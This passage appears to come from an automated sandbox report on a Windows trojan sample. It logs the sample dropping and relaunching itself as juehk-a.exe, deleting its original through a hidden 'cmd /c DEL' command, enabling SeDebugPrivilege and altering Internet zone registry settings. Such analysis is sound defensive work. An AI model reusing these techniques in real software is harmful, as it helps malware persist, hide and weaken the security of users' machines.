- value: C:\Users\Administrator\AppData\Local\Temp\MPR.DLL
- processinfo:
- tainted: true
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- regkey:
- randomized: true
- mode: queryvalue
- sequenceNumber: 40
- timestamp: 30783
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 30791
- mode: failed
- sequenceNumber: 41
- value: C:\Windows\SysWOW64\RPCSS.DLL
- processinfo:
- tainted: true
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- apicall:
- timestamp: 30795
- sequenceNumber: 42
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 30810
- sequenceNumber: 43
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 30814
- sequenceNumber: 44
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 30826
- sequenceNumber: 45
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 30841
- sequenceNumber: 46
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 30857
- sequenceNumber: 47
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 30869
- sequenceNumber: 48
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 30873
- sequenceNumber: 49
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 30888
- sequenceNumber: 50
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 30897
- sequenceNumber: 51
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryW
- address: 0x7732f96e
- params:
- param (id:1): 0x77396420
- param (id:2): 260
- mutex:
- timestamp: 30899
- sequenceNumber: 52
- value: \Sessions\1\BaseNamedObjects\DBWinMutex
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- mutex:
- timestamp: 31560
- sequenceNumber: 53
- value: \Sessions\1\BaseNamedObjects\AMResourceMutex3
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 32030
- mode: failed
- sequenceNumber: 54
- value: C:\Users\Administrator\AppData\Local\Temp\DWMAPI.DLL
- processinfo:
- tainted: true
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 32198
- mode: failed
- sequenceNumber: 55
- value: C:\Users\Administrator\AppData\Local\Temp\MSVFW32.DLL
- processinfo:
- tainted: true
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 32555
- mode: failed
- sequenceNumber: 56
- value: C:\Users\Administrator\AppData\Local\Temp\PROFAPI.DLL
- processinfo:
- tainted: true
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- apicall:
- timestamp: 32698
- sequenceNumber: 57
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: ntdll.dll
- apiname: NtAdjustPrivilegesToken
- address: 0x7584ca4f
- params:
- param (id:1): SeDebugPrivilege
- param (id:2): Enabled
- apicall:
- timestamp: 32698
- sequenceNumber: 58
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: advapi32.dll
- apiname: GetTokenInformation
- address: 0x0041e684
- params:
- param (id:1): 0x1a0
- param (id:2): 0x19
- apicall:
- timestamp: 32699
- sequenceNumber: 59
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: advapi32.dll
- apiname: GetTokenInformation
- address: 0x0041e6c6
- params:
- param (id:1): 0x1a0
- param (id:2): 0x19
- apicall:
- timestamp: 32699
- sequenceNumber: 60
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 32710
- sequenceNumber: 61
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 32749
- sequenceNumber: 62
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 32771
- sequenceNumber: 63
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 32807
- sequenceNumber: 64
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- file:
- timestamp: 32832
- mode: failed
- sequenceNumber: 65
- value: C:\Users\Administrator\AppData\Roaming\73.EXE
- processinfo:
- tainted: true
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x60
- PE:
- InspectionType: Ext
- file:
- timestamp: 32904
- type: dropped_executable
- mode: created
- sequenceNumber: 66
- value: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- processinfo:
- tainted: true
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 3096224743903578
- ntstatus: 0x0
- CreateOptions: 0x44
- PE:
- InspectionType: Ext
- malicious-alert:
- classtype: Malicious-Directory
- weight: 0
- ruleid: 2213 : Executable file created in suspicious location ; Process creating executable file in suspicious location
- msg: Process creating executable file in suspicious location
- display-msg: Executable file created in suspicious location
- malicious-alert:
- classtype: misc-anom
- weight: 100
- ruleid: 10048 : Generic Trojan Behavior ; Generic Trojan Behavior
- msg: Generic Trojan Behavior
- display-msg: Generic Trojan Behavior
- file:
- timestamp: 32967
- mode: open
- sequenceNumber: 67
- value: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- processinfo:
- tainted: true
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 3096224743903578
- ntstatus: 0x0
- CreateOptions: 0x64
- PE:
- InspectionType: Ext
- file:
- timestamp: 32975
- mode: date_change
- sequenceNumber: 68
- value: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- filesize: 364544
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- creationTime: 12/4/2015 9:43:16 PM
- lastWriteTime: 12/4/2015 9:43:16 PM
- changeTime: 12/4/2015 9:43:16 PM
- newCreationTime: N/A
- newLastWriteTime: 12/4/2015 9:43:00 PM
- newChangeTime: 12/4/2015 9:43:00 PM
- ads:
- fid (ads:): 3096224743903578
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 32984
- type: dropped_executable
- mode: close
- sequenceNumber: 69
- value: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- filesize: 364544
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- sha1sum: 8d149bc90e10db7571379dc0e62409cdcfb7427c
- processinfo:
- tainted: true
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 3096224743903578
- ntstatus: 0x0
- CreateOptions: 0x0
- PE:
- InspectionType: Deep
- Dll: No
- Machine: 0x014c
- TimeDateStamp: 0x4140dee4
- Characteristics:
- value: 0x010f
- names:
- name: Relocation info stripped
- name: Executable
- name: Line nunbers stripped
- name: Symbols stripped
- name: 32
- Magic: 0x010b
- Subsystem: Windows CUI
- DllCharacteristics:
- value: 0x0000
- names:
- process:
- timestamp: 33405
- mode: started
- sequenceNumber: 70
- value: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- pid: 2824
- ppid: 2540
- parentname: C:\Users\Administrator\AppData\Local\Temp\73.exe
- cmdline: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- filesize: 364544
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- sha1sum: 8d149bc90e10db7571379dc0e62409cdcfb7427c
- ads:
- fid (ads:): 3096224743903578
- malicious-alert:
- classtype: Process-cloned
- weight: 0
- ruleid: 8032 : Process clones and starts itself ; Process clones and starts itself
- msg: Process clones and starts itself
- display-msg: Process clones and starts itself
- file:
- timestamp: 33534
- mode: failed
- sequenceNumber: 71
- value: C:\Users\Administrator\AppData\Roaming\UI\SWDRM.DLL
- processinfo:
- tainted: true
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- apicall:
- timestamp: 33591
- sequenceNumber: 72
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: Shell32.dll
- apiname: ShellExecuteW
- address: 0x0041f5dd
- params:
- param (id:1): 0x0
- param (id:2): NULL
- param (id:3): C:\Windows\system32\cmd.exe
- param (id:4): /c DEL C:\Users\ADMINI~1\AppData\Local\Temp\73.exe
- param (id:5): NULL
- param (id:6): 0
- malicious-alert:
- classtype: Generic-Anomalous-Activity
- weight: 0
- ruleid: 8006 : Hidden ShellExecute call made ; Hidden ShellExecute call made
- msg: Hidden ShellExecute call made
- display-msg: Hidden ShellExecute call made
- file:
- timestamp: 33603
- mode: failed
- sequenceNumber: 73
- value: C:\Users\Administrator\AppData\Local\Temp\PROPSYS.DLL
- processinfo:
- tainted: true
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 33754
- mode: failed
- sequenceNumber: 74
- value: C:\Windows\System32\WOW64LOG.DLL
- processinfo:
- tainted: true
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 33857
- mode: failed
- sequenceNumber: 75
- value: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: created
- ntstatus: 0xc0000035
- CreateOptions: 0x200021
- file:
- timestamp: 33864
- mode: failed
- sequenceNumber: 76
- value: C:\Users\Administrator\AppData\Local\Temp\NTMARTA.DLL
- processinfo:
- tainted: true
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 33956
- mode: failed
- sequenceNumber: 77
- value: C:\Users\Administrator\AppData\Local\Temp\CRYPTSP.DLL
- processinfo:
- tainted: true
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- regkey:
- randomized: true
- mode: queryvalue
- sequenceNumber: 78
- timestamp: 33971
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 33979
- mode: failed
- sequenceNumber: 79
- value: C:\Windows\ARU2YO48QPE
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x60
- file:
- timestamp: 33983
- mode: failed
- sequenceNumber: 80
- value: C:\Windows\Fonts\FQ2SZNG21IEC5G4
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 33990
- mode: failed
- sequenceNumber: 81
- value: C:\Users\Administrator\AppData\Roaming\FQ2SZNG21IEC5G4
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 33995
- mode: failed
- sequenceNumber: 82
- value: C:\Users\ADMINI~1\AppData\Local\Temp\FQ2SznG21IEC5G4
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 33999
- mode: failed
- sequenceNumber: 83
- value: C:\Windows\SysWOW64\FQ2SZNG21IEC5G4
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 34005
- mode: failed
- sequenceNumber: 84
- value: C:\Windows\system\FQ2SZNG21IEC5G4
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 34011
- mode: failed
- sequenceNumber: 85
- value: C:\Windows\FQ2SZNG21IEC5G4
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 34018
- mode: failed
- sequenceNumber: 86
- value: C:\Windows\SysWOW64\wbem\FQ2SZNG21IEC5G4
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 34023
- mode: failed
- sequenceNumber: 87
- value: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FQ2SZNG21IEC5G4
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 34029
- mode: failed
- sequenceNumber: 88
- value: C:\Program Files (x86)\QuickTime\QTSystem\FQ2SZNG21IEC5G4
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 34035
- mode: failed
- sequenceNumber: 89
- value: C:\Program Files (x86)\Debugging Tools for Windows (x86)\FQ2SZNG21IEC5G4
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 34041
- mode: failed
- sequenceNumber: 90
- value: C:\Program Files\Debugging Tools for Windows (x64)\FQ2SZNG21IEC5G4
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 34047
- mode: failed
- sequenceNumber: 91
- value: C:\Windows\Fonts\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 34051
- mode: failed
- sequenceNumber: 92
- value: C:\Users\Administrator\AppData\Roaming\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 34057
- mode: failed
- sequenceNumber: 93
- value: C:\Users\ADMINI~1\AppData\Local\Temp\R38QI00a0m0\D77273j5H4b
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 34062
- mode: failed
- sequenceNumber: 94
- value: C:\Windows\SysWOW64\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 34066
- mode: failed
- sequenceNumber: 95
- value: C:\Windows\system\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 34071
- mode: failed
- sequenceNumber: 96
- value: C:\Windows\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 34077
- mode: failed
- sequenceNumber: 97
- value: C:\Windows\SysWOW64\wbem\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 34082
- mode: failed
- sequenceNumber: 98
- value: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 34087
- mode: failed
- sequenceNumber: 99
- value: C:\Program Files (x86)\QuickTime\QTSystem\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 34092
- mode: failed
- sequenceNumber: 100
- value: C:\Program Files (x86)\Debugging Tools for Windows (x86)\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 34097
- mode: failed
- sequenceNumber: 101
- value: C:\Program Files\Debugging Tools for Windows (x64)\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- apicall:
- timestamp: 34109
- sequenceNumber: 102
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: user32.dll
- apiname: EnumWindows
- address: 0x00270eba
- params:
- param (id:1): 0x270e20
- param (id:2): 0x18f5b8
- apicall:
- timestamp: 34110
- sequenceNumber: 103
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x002711cc
- params:
- param (id:1): 1100
- file:
- timestamp: 34120
- mode: failed
- sequenceNumber: 104
- value: C:\Users\Administrator\AppData\Local\Temp\RPCRTREMOTE.DLL
- processinfo:
- tainted: true
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- apicall:
- timestamp: 34657
- sequenceNumber: 105
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x7760d98d
- params:
- param (id:1): 60000
- file:
- timestamp: 34666
- mode: failed
- sequenceNumber: 106
- value: C:\Users\Administrator\AppData\Local\Temp\SECUR32.DLL
- processinfo:
- tainted: true
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- mutex:
- timestamp: 34673
- sequenceNumber: 107
- value: \Sessions\1\BaseNamedObjects\ZonesCacheCounterMutex
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 34673
- mode: deleteval
- sequenceNumber: 108
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass"
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 34675
- mode: deleteval
- sequenceNumber: 109
- value: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass"
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 34675
- mode: deleteval
- sequenceNumber: 110
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName"
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 34675
- mode: deleteval
- sequenceNumber: 111
- value: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName"
- processinfo:
- pid: 2540
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 34675
- mode: setval
- sequenceNumber: 112
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000000
- processinfo:
- pid: 2540
